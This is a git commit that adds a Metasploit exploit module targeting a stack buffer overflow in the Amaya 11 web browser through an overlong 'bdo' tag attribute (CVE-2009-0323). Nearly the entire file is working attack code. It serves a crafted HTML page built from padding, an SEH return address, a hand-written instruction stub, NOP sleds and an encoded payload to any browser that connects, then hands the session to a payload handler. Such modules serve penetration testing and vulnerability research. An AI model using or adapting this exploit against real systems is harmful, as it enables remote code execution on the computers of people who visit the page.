added exploit module amaya_bdo.rb from dookie.

git-svn-id: file:///home/svn/framework3/trunk@7136 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-10 21:51:25 +00:00
parent b6fa63701b
commit 1cadfa4ea7
1 changed files with 84 additions and 0 deletions
@@ -0,0 +1,84 @@
+##
+# $Id: amaya_bdo.rb
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Amaya Browser v11.0 bdo tag overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in the Amaya v11 Browser.
+					By sending an overly long string to the "bdo"
+					tag, an attacker may be able to execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'dookie, original exploit by Rob Carter' ], 
+			'Version'        => '$Revision: 6812 $',
+			'References'     => 
+				[
+					[ 'CVE', '2009-0323' ],
+					[ 'OSVDB', '55721' ],
+					[ 'BID', '33046, 33047' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 970,
+					'BadChars'      => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Amaya Browser v11',     { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
+				],
+			'DisclosureDate' => 'Jan 28 2009',
+			'DefaultTarget'  => 0))
+	end
+
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+		
+		# Set the exploit buffer
+		sploit = "<bdo dir=\""
+		sploit += "\x41" * 6889
+		sploit += "\x74\x06\x41\x41"
+		sploit += [target.ret].pack('V')
+		sploit += "\x68\x7f\x01\x01\x7f"   # push 7F01017F
+		sploit += "\x58"		   # pop EAX
+		sploit += "\x2d\x18\x69\x45\x7d"   # sub EAX, 7A7A0857
+		sploit += "\x50"		   # push EAX
+		sploit += "\xc3"		   # RETN
+		sploit += make_nops(100)
+		sploit += payload.encoded
+		sploit += make_nops(970 - payload.encoded.length)
+		sploit += "\">pwned!</bdo>"
+		
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, sploit)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end